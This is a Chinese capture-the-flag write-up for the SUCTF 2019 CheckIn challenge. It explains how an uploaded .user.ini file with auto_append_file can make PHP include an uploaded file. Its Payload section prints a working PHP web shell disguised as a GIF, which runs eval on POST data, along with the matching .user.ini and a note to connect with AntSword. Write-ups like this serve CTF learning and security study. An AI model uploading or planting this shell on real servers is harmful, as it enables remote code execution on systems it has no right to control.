[SUCTF 2019]CheckIn

Posted 2021-06-30 H3rmesk1t

[SUCTF 2019]CheckIn

• 考点
• 思路
• Payload

考点

.user.ini

思路

.user.ini比.htaccess用的更广，nginx、apache、IIS，只要是以fastcgi运行的php都可以用这个方法，不像.htaccess有局限性，只能是apache
php.ini是php默认的配置文件，其中包括了很多php的配置，分为几种：PHP_INI_SYSTEM、PHP_INI_PERDIR、PHP_INI_ALL、PHP_INI_USER

.user.ini是一个能被动态加载的ini文件，修改了.user.ini后，不需要重启服务器中间件，只需要等待user_ini.cache_ttl所设置的时间（默认为300秒），即可被重新加载

auto_prepend_file指定一个文件，自动包含在要执行的文件前，类似于在文件前调用了require()函数；auto_append_file类似，只是在文件后面包含，使用时直接写在.user.ini中：

GIF89a
auto_prepend_file=01.gif

所以我们先上传一个gif文件再上传一个.user.ini文件包含它

Payload

shell.gif文件内容

GIF89a
<script language="php">
    if(@$_GET['shell']=='test'){
        phpinfo();
    }
    @eval($_POST[1]);
</script>

.user.ini内容

GIF89a
auto_append_file=shell.gif

等生效后，用蚁剑连接即可